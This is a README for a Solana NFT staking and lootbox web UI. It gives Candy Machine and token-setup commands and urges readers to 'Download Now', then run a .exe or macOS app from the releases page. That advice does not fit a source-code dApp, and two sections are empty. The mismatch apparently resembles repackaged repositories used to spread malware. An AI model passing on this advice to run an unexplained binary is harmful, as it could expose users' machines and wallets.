deaddorman

🎨 solana-staking-lootbox-ui - Mint NFTs, Stake, & Win Rewards

Download Now

🚀 Getting Started

Welcome to the Solana DApp for NFTs, Staking, and Lootboxes. This app allows you to mint NFTs, stake them, and win $PINK as rewards. You can also exchange your rewards for a random Lootbox.

📥 Download & Install

To get started, visit this page to download the latest version of the application: GitHub Releases.

Make sure to download the version that matches your system.

🌐 System Requirements

🔧 Setting Up the Application

  1. Download the Application: After visiting the GitHub Releases page, choose the latest stable release for your system and download it.

  2. Install the Application: Follow the instructions provided for your operating system to install the application. For example, on Windows, simply run the downloaded .exe file and follow the prompts. On macOS, drag the application into your Applications folder.

  3. Launch the Application: Once installed, open the application from your desktop or applications menu.

🎨 Creating Your NFT Collection

To create your NFT collection, follow these steps:

  1. Open a terminal or command line.
  2. Navigate to the Candy Machine directory:
    cd src/tokens/candy-machine
    
  3. Launch the Candy Machine by running the following command:
    sugar launch
    
  4. Set your CANDY_MACHINE_ADDRESS and NFT_COLLECTION in src/utils/constants.ts.

💰 Creating Your Reward Token

To set up your reward token:

  1. Open src/utils/constants.ts.
  2. Set the nft-staking programId. You can find it in the programs repository.
  3. Run the command below to create your $PINK token:
    npm run create-pink-token
    
  4. Set your TOKEN_REWARD in src/utils/constants.ts to match your newly created token.

🎶 Creating SONGs Token

To create a SONGs token, you will need to follow a similar process:

  1. Open src/utils/constants.ts.
  2. Set the lootbox programId. This information is also available in the programs repository.

🎥 Features

💬 Support

If you run into issues or have questions about the application, please open an issue in the GitHub repository. We appreciate your feedback and are here to help you succeed with our application.

Thank you for using the Solana DApp for NFTs, Staking, and Lootboxes! Enjoy minting and winning!